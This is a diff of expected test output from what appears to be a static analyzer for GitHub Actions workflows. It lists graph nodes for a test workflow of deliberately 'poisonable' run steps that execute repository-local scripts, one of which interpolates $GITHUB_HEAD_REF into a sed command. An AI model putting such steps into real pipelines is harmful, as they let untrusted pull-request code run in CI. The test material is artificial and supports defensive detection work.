.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css 
| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo 
"bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | 
Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: 
local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -665,11 +672,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -728,8 +735,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -808,7 +817,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
